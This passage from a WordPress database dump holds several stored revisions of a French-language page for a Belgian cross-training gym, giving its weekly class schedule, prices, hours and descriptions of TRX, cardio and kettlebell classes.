(195, 1, '2013-07-03 17:40:44', '2013-07-03 17:40:44', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 38%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:44', '2013-07-03 17:40:44', '', 11, 'http://www.crosstrainingcenter.be/?p=195', 0, 'revision', '', 0),
(196, 1, '2013-07-03 17:40:57', '2013-07-03 17:40:57', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 41%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:57', '2013-07-03 17:40:57', '', 11, 'http://www.crosstrainingcenter.be/?p=196', 0, 'revision', '', 0),
(197, 1, '2013-07-03 17:41:14', '2013-07-03 17:41:14', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 43%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:41:14', '2013-07-03 17:41:14', '', 11, 'http://www.crosstrainingcenter.be/?p=197', 0, 'revision', '', 0),
(199, 1, '2013-07-03 17:49:28', '2013-07-03 17:49:28', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 